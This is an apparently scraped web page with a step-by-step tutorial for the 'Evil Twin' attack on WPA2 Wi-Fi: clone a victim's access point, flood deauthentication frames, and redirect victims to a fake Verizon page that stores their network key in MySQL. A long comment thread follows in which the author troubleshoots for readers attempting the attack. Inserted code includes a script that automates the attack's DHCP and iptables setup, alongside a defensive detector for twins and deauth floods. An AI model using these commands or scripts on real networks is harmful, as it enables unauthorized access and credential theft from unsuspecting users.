Hacking Wpa 2 Evil Twin Method


Transcript of Hacking Wpa 2 Evil Twin Method

Page 1: Hacking Wpa 2 Evil Twin Method

While that technique works, it could take an awful long time, especially when brute forcing.

On this technique, named 'Evil Twin', we take a different perspective to the attack. Using a powerful long range wireless card (Alfa AWUS036NH), we clone the target network to confuse our victim. Then, we deauthenticate the victim from his own wireless network and wait until he connects to our access point – which looks exactly like his.

When the victim connects, he is redirected to a service page asking for the WPA-2 key in order to access the internet. As soon as we get the key, you can either allow the victim to use the network (maybe improvise some password sniffing?) or just bring it down manually.

For this example I created a service page based on Verizon ISP. The files are placed at the default location (/var/www/). I created a database called 'wpa2', which can be done with the following commands:

Login to MySQL:
mysql -u root -p
Note: Default backtrack user/pass are root/toor

Create the database:
create database wpa2;
use wpa2;
create table content(key1 VARCHAR(64), key2 VARCHAR(64));

Finally, start the apache and mysql services and check that everything works by typing localhost in a web browser.




Install dhcp3 and create config file:
apt-get install dhcp3-server -y
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
gedit /etc/dhcp3/dhcpd.conf

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet netmask {
option subnet-mask;
option broadcast-address;
option routers;
option domain-name-servers;

Start clone access point:
airmon-ng start wlan0 [channel]
airbase-ng -e "AP name" -c [channel] mon0
ifconfig at0 up
ifconfig at0 netmask
route add -net netmask gw
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
/etc/init.d/dhcp3-server start

Flush iptables:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface [internet connection]
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Redirect traffic:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [IP
iptables -t nat -A POSTROUTING -j MASQUERADE

DeAuthenticate Access Point (poor):
aireplay-ng -0 0 -a [target bssid] [monitor interface]


DeAuthenticate Client (recommended):
aireplay-ng -0 0 -a [target bssid] -c [client mac] [monitor interface]
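The setup above leaves two things visible to anyone monitoring the air: a second BSSID advertising the same ESSID (open, where the real network is WPA2) and the continuous deauthentication that aireplay-ng -0 0 produces. The following Python is an added detection example, not code from the original post; the Beacon and Deauth records, the KNOWN_APS allow-list and all addresses are constructed.

```python
"""Added example: flag the two signatures of the clone setup described above
from constructed airodump-ng-style scan records (not code from the post)."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Beacon:
    essid: str
    bssid: str
    channel: int
    privacy: str   # "OPN" for an open network, "WPA2" etc. otherwise
    power: int     # signal strength in dBm


@dataclass(frozen=True)
class Deauth:
    ts_ms: int     # capture time in milliseconds
    bssid: str     # AP address the deauth frame claims to come from


# Hypothetical allow-list: which BSSIDs legitimately serve each ESSID.
KNOWN_APS = {"HomeNet": {"00:11:22:33:44:55"}}


def find_evil_twins(beacons, known_aps=KNOWN_APS):
    """Return {essid: [(bssid, [reasons])]} for every BSSID that advertises
    an allow-listed ESSID without being on the allow-list. A privacy
    mismatch (open clone of a WPA2 network) is recorded as a second reason."""
    by_essid = defaultdict(list)
    for b in beacons:
        by_essid[b.essid].append(b)
    findings = {}
    for essid, seen in by_essid.items():
        legit = known_aps.get(essid)
        if not legit:
            continue                      # ESSID we do not monitor
        legit_privacy = {b.privacy for b in seen if b.bssid in legit}
        for b in seen:
            if b.bssid in legit:
                continue
            reasons = ["unknown BSSID"]
            if legit_privacy and b.privacy not in legit_privacy:
                reasons.append(
                    f"privacy {b.privacy} vs {'/'.join(sorted(legit_privacy))}")
            findings.setdefault(essid, []).append((b.bssid, reasons))
    return findings


def deauth_flood(frames, window_ms=1000, threshold=20):
    """Return {bssid: peak} for APs that see more than `threshold` deauth
    frames within any `window_ms` sliding window (two-pointer sweep over
    the sorted timestamps). A legitimate AP deauthenticates rarely."""
    per_ap = defaultdict(list)
    for f in frames:
        per_ap[f.bssid].append(f.ts_ms)
    flooded = {}
    for bssid, times in per_ap.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window_ms:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flooded[bssid] = peak
    return flooded


# Constructed sample: the real AP, an open clone with a stronger signal, and
# an unrelated network.
SAMPLE_BEACONS = [
    Beacon("HomeNet", "00:11:22:33:44:55", 6, "WPA2", -62),
    Beacon("HomeNet", "00:12:23:34:45:56", 6, "OPN", -38),
    Beacon("Guest", "aa:bb:cc:dd:ee:01", 11, "WPA2", -70),
]
# Constructed sample: 60 deauth frames in two seconds against the real AP
# (the kind of stream `aireplay-ng -0 0` sends) plus a normal trickle elsewhere.
SAMPLE_DEAUTH = (
    [Deauth(33 * i, "00:11:22:33:44:55") for i in range(60)]
    + [Deauth(5000 * i, "aa:bb:cc:dd:ee:01") for i in range(5)]
)

if __name__ == "__main__":
    for essid, hits in find_evil_twins(SAMPLE_BEACONS).items():
        for bssid, reasons in hits:
            print(f"possible evil twin of {essid}: {bssid} ({'; '.join(reasons)})")
    for bssid, peak in deauth_flood(SAMPLE_DEAUTH).items():
        print(f"deauth flood against {bssid}: {peak} frames in one second")
```

Real records would come from a monitor-mode capture; the thresholds are starting points to tune against a baseline of your own network.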



John (280 days)

Very professional video.
Would you consider uploading the index.html/php for us to modify? Or make a tutorial on the code behind the service page?


admin (280 days)

Hey John!
Thanks for the feedback. The post has been updated with the download link and instructions. Hope it helps.
Take care.


sickee (280 days)

Hi! For your Hacking WPA 2 Key – Evil Twin Method (No Bruteforce) where did you exactly place your template and is it ok if you could upload your example template. Currently I am trying to implement the same method with airsnarf and I am having serious issues with the dhcp on backtrack. Please help dude!


admin (280 days)


Hey sickee!
I uploaded the post and added the download link. The files can be copied and pasted on to the /var/www/ folder. Once that's done, start Apache and MySQL from the services menu, and go type localhost to test it in a web browser.
Let me know how it goes, or contact me in IRC (freenode.net). Nick: deathcorps
Take care


otlin (271 days)

Good day, we tried:
root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 34
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
after that we tried to create the table contents as below:
mysql> create table content(key1 VARCHAR(64), key2 VARCHAR(64));
and after that this appears:
ERROR 1046 (3D000): No database selected.
Could you explain where my mistakes are.
Take care


admin (271 days)


Hey otlin, the article has been updated. There were two commands prior to that missing, which were:
create database wpa2;
use wpa2;
and finally:
create table content(key1 VARCHAR(64), key2 VARCHAR(64));
Try that out and it should work.
Thanks for the feedback!


darkey (270 days)

Hello sir
I'm a new user in Backtrack. I would like to know if there is any way to crack a WPA2 without using dictionaries?
I got a handshake from a cable modem (HITRON), key length 12 characters, e.g. ( 40I3WQ893RCO ), and I cracked the cap file but the passphrase is not in the dictionary. Please help me.
I need a 12-character, e.g. ( 40I3WQ893RCO ), password list or how to crack this cap file easily. Please help me.. I am waiting for the reply, please please..


admin (270 days)

I'm not understanding you completely..
This technique in the video DOESN'T use a dictionary.
But if you have the cap file, then you HAVE to use either a dictionary, or a brute-
I ran into this the other day, which has many wordlists:




otlin (270 days)

Good day,
thanks for your prompt reply. I checked as you told and it worked. However I tried to start your page as localhost on a web browser, but it doesn't work. I had put all files from folder "verizon" to folder "www". Apache and MySQL had been started before working with the web browser, but I could see only this
"It works!
This is the default web page for this server.
The web server software is running but no content has been added, yet."
And I have one more question, I am a beginner in working with LINUX, and I ask, if possible, to create a "BASH script" for automatic entering of all commands which were given by you. Please advise.
Take care


admin (270 days)

Well, you extracted the folder too.
The files have to be exactly at /var/www/
Not at /var/www/verizon/
It is possible for me to make the bash script, however, this script would change from version to version, so it would be too time consuming.
I'd much rather invest that time on learning new techniques =)
Why don't you take the initiative?


otlin (270 days)

Hi, sorry again.
I extracted exactly at /var/www/ several times, but the result is the same,


"It works!
This is the default web page for this server.
The web server software is running but no content has been added, yet."
All the best


admin (270 days)

Hey Otlin!
Try copying all the files inside of /var/www/verizon/ to the directory /var/www/ … you should replace the index.html already there with the one from my template.
You pasted the files inside of the verizon folder, where they should just be in the
Hope it helps


michel (270 days)

sorry for the inconvenience
I'm again
i watched your video more than 5 times, your idea is very great
I'm not a pro hacker or a programmer, im an IT admin and i use backtrack as a regular user.. i have an idea if you can help me because you are 100 times more professional than me ..
my idea is why don't we use your steps but in a different way
let's clone the WAP for the victims by making a similar WAP with the same name and same range after we monitor and get the information about the victim
then we must denial-of-service the victim's WAP and then force users to connect to our fake WAP??? here is the puzzle
we must find a tool or create a tool that will work together with our access point to retrieve all the traffic from our access point to our database (mysql, wpa2) or by capturing the traffic inside our access point.


more explanation (sorry my english is not too strong):
as an example
{we must kill the victim's WAP by sending 1000s of traffic to keep it too busy to respond to the client and force the client to check his WAP. the client will note that there are two access points with the same name, one of them with a poor signal, another with full signal (our fake access point)}
1- our access point must also be secured with a key
2- the client victim must point to our wap and he will click connect
3- our access point will ask him to insert the wpa2 key
4- our access point will redirect the key to our backtrack database
{ here we must find a way to capture all the traffic inside our fake WAP and to force it to redirect to the database or to capture what the victim client types for the key.
sorry again for the inconvenience and many thanks
awaiting your response teacher


admin (270 days)

Hey Michel!
You don't need to explain any further my friend!
That was actually my original idea… however, I ran into trouble at the last step. I couldn't find a way to retrieve the victim's association key, since he isn't associated yet.
The victim only gets an IP after being associated, so that makes our webserver (apache) useless.
So the problem is we need a router that can either trick the user into thinking it's a WPA2 network or that simply records the keys.
I'm also not sure if just sniffing the network would lead us in finding the key…
If you have something to add or any other ideas, I'm really interested in hearing
Take care


otlin (269 days)


Good day again,
Thanks a lot for your advice, I've already started the localhost page, but could you tell me from where or how you get the IP address which you input in firefox after the command "iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [IP address:80]".
Take care.


admin (265 days)

Hey Otlin!
The IP address is my own internal IP, which I use as a webserver running apache.
After you start apache you should be able to access the website by typing your IP address in the url of a browser.
To find your IP type: ifconfig


darkey (265 days)

root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 34
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use wpa2;
ERROR 1049 (42000): Unknown database 'wpa2'
why does this error message come to my display? can u explain to me please????



admin (265 days)

You have to create the database first.
As the comment below mentions:
first of all you have to create your database using :
Login to MySQL:
mysql -u root -p
Note: Default backtrack user/pass are root/toor
Create the database:
create database wpa2;
use wpa2;
create table content(key1 VARCHAR(64), key2 VARCHAR(64));


Vpoint7 (247 days)

You do have some point here, evil twin is considered an old time method, but pretty much might work anyway. I'll give this a try, and might ask u later for any doubts.


Unknown (265 days)


first of all you have to create your database using :
Login to MySQL:
mysql -u root -p
Note: Default backtrack user/pass are root/toor
Create the database:
create database wpa2;


use wpa2;
create table content(key1 VARCHAR(64), key2 VARCHAR(64));
but my question for admin is:
i'm facing problems in watching the video, how would i check the table to see passwords ?


admin (265 days)


My suggestion is, as soon as you see a client has connected to the cloned network (you can see this in the terminal where you brought the network up), stop
Then to check the table you have to log in to mysql.
Then: use wpa2;
Then: SELECT * FROM content;
Assuming you created the table with the commands I gave out and the client entered the password, you should see the entries.
If you would like to test this, go to your browser after starting apache and try to input a password and see if it saves it.
Take care :]


darkey (263 days)


sorry for the disturbance, how to create the database????
do u have any video about creating the database ???
please help me



darkey (263 days)

root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 35
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use wpa2;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from content;
Empty set (0.00 sec)
sorry for the disturbance, how to create the database????
do u have any video about creating the database ???
please help me


admin (263 days)


You have successfully created the database. However, your database is still empty. That means nobody entered a pass at the service page.


You can see this from the line: "Empty set (0.00 sec)"
Try accessing your page and enter a value yourself to make sure it works properly!


darkey (262 days)

lots of thanks admin
"Try accessing your page and enter a value yourself to make sure it works properly!"
how do I access my page????


admin (256 days)


To find your IP, open a terminal and type: ifconfig
Now, assuming you started apache & mysql, type your ip in a web browser, or just localhost.
If you have placed the "Service page" in the correct directory you should see the page, otherwise you will see the apache page saying "It works!".
Hope it helps


T!G3R (257 days)

Hello Admin,
First of all I want to thank you for this great video.
Secondly, I hope that you explain me this step :
gedit /etc/dhcp3/dhcpd.conf



ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet netmask {
option subnet-mask;
option broadcast-address;
option routers;
option domain-name-servers;

I want to know if I should copy and paste all these lines without any changes or I need to change some IP address.
Finally, thank you in advance.
Bye Bye


admin (257 days)

Hey T!G3R!
You should copy everything starting at the line: ddns…
If you look at the lines you will see this is a network model.
It tells you the range of internal IP's to use, allocated addresses, etc.
In my house I use the range:
Because of that, I decided to use the range for this.
Notice that if your home network uses the same range, it can cause confusion with your devices.
If you would like to know more, google Subnetting.
Thanks for the feedback =)


Rafael (152 days)

Hello, I love your work, congratulations.


Only a doubt, my local ip is
Do I use the same settings that you use in the video?
Since the machine's IP is BT5


spartacratus (256 days)

hi !!!
great tuto. i've a problem. i did all the steps and the fake webpage appears, and i want to try it so i put in a password and after that i start mysql
root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 35
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use wpa2;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from content;
Empty set (0.00 sec)
i type the password but nothing appears plz help me
i'm algerian sorry my english is not strong
help me teacher



admin (256 days)

Hey @Spartacratus !
So you're saying you see the service page, type the password but it doesn't send it to the mysql database?
After you type the password you should get a message saying "Saving Settings", just like in the video.
If you're still getting Empty set on mysql, that means it's not saving the password.
Why don't you send me a screenshot of what's going on to my email, and I can further help you.
[email protected]


spartacratus (255 days)



redpen (254 days)

hello admin,
I followed all the steps and entered all the commands. I have created the database and downloaded the template and placed the files in the var/www folder. I installed the dhcp server and copied the settings into the new config file. I started the fake clone access point and flushed the tables and redirected the traffic. When I tried to access the fake web page from my own machine it worked. I was able to connect to the fake access point from the test target client machine. However when I tried to access the fake web page from the test target client machine I got "web page cannot be found", as when you are not connected to the internet.



Rehan (254 days)

This command doesn't work for me
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0


sparta (253 days)

hi !!!
i'm kamel from algeria, i want to know how i can connect to a hidden network
1- the ssid of the network isn't hidden, it is "gaamex-direction"
2- when i type airodump-ng mon0 this network appears and it is unsecured
3- but when i go to windows xp and i scan the networks i don't find it, so i click on hidden essid and i type "gaamex-direction" but a window pops up saying "the network exists" but i can't connect
4- in backtrack wicd network manager i can't find it
can u help me how i can connect to it ?


Jack (251 days)

hey, thanks admin, but i have only one question ..
when i open my browser to check the page status ..http:ipaddress and then enter, this is what the page says: "It works!
This is the default web page for this server.
The web server software is running but no content has been added, yet."


and we must type "http:ipaddress/index.html" to check it
now what will happen when the victim opens my page, will he get 'http://ipaddress' only or will he get 'ipaddress/index' ??? pls reply


admin (245 days)

You have placed the website in the wrong place.
The files should be DIRECTLY at:
Meaning that the index.html should be:
I'm assuming you can access the files by typing:
Have you included the folder as well?
Just paste the files, not the folder.


Dohn Joe (245 days)

Looks like the Evil Twin Method(TM) will have to be shelved for a while. Check out the latest WPS vulnerability on Dan Kaminsky's blog:



admin (245 days)

As much as I would love to agree, this isn't true.
I have tried version 1.0 with bad results. Turns out one of the biggest providers in the US (verizon) uses routers with WPS deactivated by default.
Furthermore, large enterprise networks will never have WPS enabled, which makes the evil twin method perfect for the scenario.


Besides that, I really liked the concept of reaver and am looking forward to trying it again! Just waiting for a stable release.
Hopefully a stable version will come out before the router manufacturers patch an update to disable WPS by default.


darkness (241 days)

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet netmask {
option subnet-mask;
option broadcast-address;
option routers;
option domain-name-servers;

what do you specify in accordance with this section?


admin (234 days)

This will create the specifications for the network.
For example, the last line says range … that means we are going to have a max. of 10 clients able to connect to this network. If you wanted to allow 20, you would change the 140 to 150.
All the lines are self-explanatory if you have some knowledge in networking! =)


John (241 days)


Very nice technique. It's probably very common for basic users to enter the WPA2 key in the prompt but is it also a default Verizon AP authentication method? It's probable a more tech savvy user will expect to see the AP-login password as most after market routers do when you try to login. The problem is, how to know the router password? I have an idea and I'll throw you a ball:
1. DoS the target AP -> wait for it to disappear on airodump (use quick refresh option), (user resets his device, most common way to do fault diagnostics), spoof your client MAC and connect to the AP. Login and recon info: site appearance, AP model, IP's, etc. Works rather well because in many cases the router's default wireless is open and up by default.
2. Rebuild the entire router configuration site to look identical and make the WPA2 setup page connect to MySQL.
3. DoS once more -> When victim resets his AP, put up evil twin server with almost identical MAC-addr. (If airbase could just ignore the deauth packets sent to its MAC-addr. you could even use the same one.)
4. User expects his router to pop up in windows with its default values and makes a mistake and connects and configures the evil twin (could even affect airbase-settings). The set WPA2 password is recorded and settings take effect immediately. If the target MAC is behind the same NAT not even the external IP will appear different, user can't tell who it is connecting to. The key is collected. Suddenly, the problem reoccurs (attacker DoS's his airbase), the router crashes. User makes another reset and this time it seems to work (what was the matter with it?)
5. Attacker hopes user will configure the same password for his own AP and many times he does because it's less complicated than setting a new passphrase for all wireless devices.


admin (226 days)

Oh boy, this sounds insanely ingenious!
Just how I like it!
Any chance you can send this to my email at [email protected] ?
If you could specify the purpose on each step also, that would be awesome… I'm looking into developing a part two of this tutorial.


Even though we have Reaver now (if you noticed, my video came out slightly before reaver was publicly released), I'm sure all the hackers like to have an extra card up their sleeve.
Take care John!


sergio (239 days)

lots of thanks admin for the video
but i have a problem…
root@bt:~# ifconfig at0 up
root@bt:~# ifconfig at0 netmask
root@bt:~# route add -net netmask gw
root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid
Internet Systems Consortium DHCP Server V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
/etc/dhcp3/dhcpd.conf line 10: semicolon expected.
/etc/dhcp3/dhcpd.conf line 10: unexpected end of file
Configuration file errors encountered -- exiting
*i have installed the dhcp3-server but i don't find it in /var/run/
can u help me?



Boody (232 days)

hi, so when you enter this :
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet netmask {
option subnet-mask;
option broadcast-address;
option routers;
option domain-name-servers;

you get the error, i got that too, just add a semi-colon to the end of the line:
range; <<like this
and it will work, good luck


Bad Biddy (231 days)

I get this same error. Have you figured it out?


admin (231 days)

Yes, sorry about that!
It was a typo on my fault, I missed a semi-colon at line 10, like the error says.
You can just insert a semi-colon (;) at line 10 or copy and paste from the website into the dhcpd.conf file since it is now updated.
This is the line in question, it was like this:
Should be like this:
Thank you!



kira (235 days)


question ;
for the :
subnet netmask {
is it general or must I change it ?
because IPs on my network are like ….
thank you


admin (231 days)

Is the subnet mask on your network ?
If it is, then yes.
The only thing you can't have is two IP's on the same subnet.
Suppose your IP was and you tried to create this network, then you would have a problem.


Bad Biddy (232 days)

I'm getting this error code for some reason
root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid
Internet Systems Consortium DHCP Server V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.


For info, please visit https://www.isc.org/software/dhcp/
/etc/dhcp3/dhcpd.conf line 10: semicolon expected.
/etc/dhcp3/dhcpd.conf line 10: unexpected end of file
Configuration file errors encountered -- exiting


admin (231 days)

Yes, sorry about that!!!
It was a typo on my fault, I missed a semi-colon at line 10, like the error says.
You can just insert a semi-colon (;) at line 10 or copy and paste from the website into the dhcpd.conf file since it is now updated.
This is the line in question, it was like this:
Should be like this:
Thank you!


Boody (232 days)

Hi Admin,
First of all, i would like to thank you a lot for this great video!! then, i have a question, everything went great and working, but when i connect with my other laptop to the cloned network i get a connection but limited or no connectivity, so when i try to visit any website it doesn't redirect me to the verizon page, it just gives me server not found, is there a solution for this?
And one more question, what is that that you posted at the bottom of the page where to use it "You may use these HTML tags and attributes:


admin (231 days)

Hey Boody!
What we are trying to do is bridge the connection in Linux, so you are connected to internet in let's say wlan0 interface you want to bridge it to at0, as you can see in this line of code:
iptables --table nat --append POSTROUTING --out-interface [internet connection] -j
The out-interface should be where you're connected to the internet, in my case I used two wireless cards, so I used the wlan interface. If you were connected on eth0 for example, you would type eth0 in there.
I usually use my Android phone to create a hotspot and share that connection…
Oh, and the "You may use these HTML tags…" is for the comments on the website and not part of the tutorial or commands section.
Hope I helped in some way and if you still have the problem, let me know. I'm thinking of working on a forum due to the amount of questions, I know it gets hard to even find my reply since there's so many comments.
Take care boody


Blood (228 days)

Hi, i've a problem redirecting the target laptop to the verizon page. Why? I have a Broadcom BCM4312 internal wifi card to run the attack. Does it work?



admin (226 days)

Hey Blood!
What problem specifically are you having? I can't tell if it works or not, but you can always try it yourself!
Start up Backtrack, and once it loads, issue the command:
If you see a wireless interface (such as wlan0, etc.), it works!
Issue wicd and try connecting to the network properly.
Notice this isn't the easiest of methods… some knowledge will come in handy for it.
Take care, and good luck!


DONZ (228 days)

hey. I have the verizon files in /var/www. the files are not in the verizon folder so I'm wondering why I still get the 'It Works' page in the browser. any help?


admin (226 days)

Have you replaced the index.html file with the one in the verizon folder?
That is the file that is looked up whenever someone accesses the server.


George (227 days)


Hi Admin!
I have a question.. First of all many thanks for this great video.. Well my problem is that i make the fake AP and i managed the connections fine, so when i connect to the fake AP i can access the webpage that we created, but the problem is that it is taking too much time, about 4 - 5 mins. Any help?


admin (226 days)

Hey George!
The issue seems to be the wireless card used to create the fake AP. Perhaps the card itself isn't "powerful"?
For the video and all my lab work, I use only Alfa wireless cards because they provide great range and power — awus036nh to be specific.
Also, what is your internet connection from the ISP?
Here in the USA, I get around 10mb, which is plenty and loads up most pages rather fast.
If you think there might be something wrong going on, and have some networking experience, I recommend downloading "Wireshark", it lets you analyze network
You might find that something else is happening with the packets, maybe they're being sent somewhere where they're not supposed to be sent?
Give it a try and let us know!
Take care buddy!


doctorK (226 days)

Hi admin
thanks for the video.. very nice!


i've a problem.. i can't connect the client to the fake AP
i tried to set in the client "no encrypt" for the connection but it is the same…
i don't know what i can do
john's post is also interesting
can anybody make a video about that??



admin (226 days)

Hey buddy doctorK!
Do you see the fake access point broadcasting at least? Can you see it in your list of wireless networks?
The network should be open, that means it has no encryption, so your actions seem right. Does it have low signal by any chance?
Make sure to issue an ifconfig command and see if you have IP's in different subnets, because you can't have two IP's on the 192.168.2.* range.
Take care!


doctorK (226 days)

thanks for the reply admin
yes i can see the fake AP with the client but i can't connect to it
i've a good signal
what about ifconfig
i did everything that you said in the tutorial




Braun (225 days)

Hi admin, i have a problem with the ip address. How do you get the IP address which you input after the command "iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [IP address:80]"? How do i get my ip address? I don't know!. Probably i have to configure the apache server. but how do i do it? Please, help me. thank you


Braun (225 days)

How to configure /etc/apache2/httpd.conf and /etc/hosts ?


admin (209 days)

Hey Braun!
This is how it works:
We have two interfaces right, one is connected to the internet and the other one is the wireless interface used to create the access point.
So let's say you're connected to the internet via cable (eth0). In that case you issue the command ifconfig and look over there, you should see your IP address.
Starting apache is easy, it already comes pre-installed in Backtrack.
Go to the menu:
Backtrack > Services > HTTP
Hope it helps!


Ali (225 days)


Hey Bro, First of all i wanted to thank you for this Great mind you have, it's a really smart method to use, which i liked too much and really thanks for sharing, but bro i have one little problem which is really weird, i DID everything perfectly and i got it without any errors but when i try to connect to my new access point, which is unsecured, using another pc i can't connect to it, i get an "unable to connect to AP", so what do you think the problem is, is it from my Wireless device, i am not sure, i have Atheros AR9170 which is supported by the aircrack suite, but i saw in ur video u use 2 interfaces while setting some options, u used wlan0 and next time wlan2, but i only have one interface which i used in the two settings which is wlan0, just wanted to mention that so u can help me, thank you sooo much again for sharing and reading my problem



admin (209 days)

Hey Ali!

How's it going?

The reason I use two interfaces is because after obtaining the key we can usually make good use of the created access point to implement password sniffing and such without need of ARP poisoning.

Is there no other way you can use an interface for internet? I have a rooted Android that I create an access point for internet with. You can always use eth0 as well.

Take care


Wle.INC (221 days)

Hey man, great tut!

I too get "It works This is the default..."

I dunno why, I HAVE placed the contents of the Verizon folder in /var/www.

I have edited the httpd.conf file (DirectoryIndex /var/www/index.html etc), but nothing seems to work.

Please help!

Best wishes,



admin (209 days)


Have you replaced the index.html at /var/www?

I don't understand why this is happening, to be honest... have you accessed it from your own browser?

Start Apache, then try opening Firefox and type localhost in the URL bar.

See if you still get the "It works! ..." even after replacing it.

Take care


austin316 (209 days)

Can you please tell me where this came from: 00:12:23:34:45:56?

If we don't use the -a option then the clone network will automatically use the MAC of the interface that is on mon0.

One more question: what IP should I use? Where exactly did yours come from?


admin (209 days)

Hey Austin!

You got it pretty much! If you don't specify anything it uses the MAC address of the monitor interface.

The IP comes from wlan2, where I am connected to the internet via a rooted Android used to create a hotspot; there I run Apache.

Then I use interface wlan0 to issue the monitor interface, which I use to create the access point.

Hope it helped! Take care.


austin316 (208 days)

Thanks a lot, I appreciate it.

Should I edit /etc/dhcp3/dhcpd.conf according to the WLAN settings that I'm connected to the internet with? I mean subnet mask etc.

Last question, but not least:

How do I delete or remove a clone network?


admin (207 days)

The /etc/dhcp3/dhcpd.conf should actually be different from your WLAN settings; just copy and paste from the article above.

Double check your WLAN interface just to make sure it doesn't interfere with the subnet.

To delete the network you just bring airbase down. On the terminal where you opened it, just hold Ctrl and press C... and you won't see it in the wireless APs.

Take care


anemos (205 days)


Well, I got to the step where I deauthenticated the AP's client (that's myself, so to test) but when I stop the attack in order to get connected again no 'Verizon site' appears to get the key... what am I missing? Should it be a second device connected to get it right? MySQL & Apache work fine... thanks!


lars (193 days)

Will this work if I try it on a WPA2-PSK protected network??


admin (187 days)

Yes! This is actually meant for WPA / WPA2.


Max (183 days)

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [IP

I am on a college wifi and I don't know what IP address to enter, please help.


admin (183 days)

That's the IP address of the interface on your computer where you are connected.

ifconfig [interface]

In the video I used wlan2, so e.g. ifconfig wlan2

If you are connected, it will tell you the IP of that interface.
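The thread keeps circling two questions: which IP goes into the DNAT rule (the admin's answers to Braun and to Max above) and why the DHCP subnet for the fake AP must differ from the uplink's subnet (the admin's answers to doctorK and austin316). The following is an added example, my own code rather than the post's or any commenter's, that does both mechanically: it pulls the uplink address and netmask out of ifconfig output, picks a subnet for the fake AP that does not overlap it, renders the dhcpd.conf and emits the two iptables rules. The ifconfig sample and all addresses are constructed for the example; the candidate subnets and the at0 interface name (the tap interface airbase-ng creates) are my assumptions, and the -i/-o restrictions on the rules are my addition, not the post's.

```python
import ipaddress
import re

# Constructed sample of BackTrack-era `ifconfig wlan2` output (not taken from
# the page). The addresses are assumptions chosen for this example.
SAMPLE_IFCONFIG = """\
wlan2     Link encap:Ethernet  HWaddr 00:c0:ca:12:34:56
          inet addr:192.168.43.17  Bcast:192.168.43.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
"""


def uplink_from_ifconfig(text):
    """Return the uplink's IPv4 address plus netmask as an IPv4Interface."""
    m = re.search(
        r"inet addr:(\d+\.\d+\.\d+\.\d+)\s+Bcast:\S+\s+Mask:(\d+\.\d+\.\d+\.\d+)",
        text,
    )
    if m is None:
        raise ValueError("interface has no IPv4 address; is it connected?")
    return ipaddress.IPv4Interface(f"{m.group(1)}/{m.group(2)}")


def choose_ap_subnet(uplink, candidates=("192.168.2.0/24", "10.0.2.0/24")):
    """Pick the first candidate subnet that does not overlap the uplink's
    network. If the fake AP shared a range with the uplink, the kernel could
    not tell which interface a packet for that range belongs to."""
    for cand in candidates:
        net = ipaddress.IPv4Network(cand)
        if not net.overlaps(uplink.network):
            return net
    raise RuntimeError("every candidate subnet collides with the uplink")


def dhcpd_conf(net):
    """Render dhcpd.conf for the fake AP's subnet: the attacker box (first
    host address) is gateway and resolver, and the pool lies inside `net`."""
    router = net[1]
    return (
        "ddns-update-style ad-hoc;\n"
        "default-lease-time 600;\n"
        "max-lease-time 7200;\n"
        f"subnet {net.network_address} netmask {net.netmask} {{\n"
        f"  option subnet-mask {net.netmask};\n"
        f"  option broadcast-address {net.broadcast_address};\n"
        f"  option routers {router};\n"
        f"  option domain-name-servers {router};\n"
        f"  range {net[10]} {net[100]};\n"
        "}\n"
    )


def iptables_rules(uplink_ip, ap_iface="at0", uplink_iface="wlan2"):
    """The redirect from the thread, restricted to the AP side (-i at0) so
    the box's own port-80 traffic on the uplink is untouched, and the
    MASQUERADE restricted to the uplink (-o wlan2)."""
    return [
        f"iptables -t nat -A PREROUTING -i {ap_iface} -p tcp --dport 80 "
        f"-j DNAT --to-destination {uplink_ip}:80",
        f"iptables -t nat -A POSTROUTING -o {uplink_iface} -j MASQUERADE",
    ]


if __name__ == "__main__":
    uplink = uplink_from_ifconfig(SAMPLE_IFCONFIG)
    ap_net = choose_ap_subnet(uplink)
    print(f"uplink {uplink}  ->  fake AP subnet {ap_net}")
    print(dhcpd_conf(ap_net))
    print("\n".join(iptables_rules(uplink.ip)))
```

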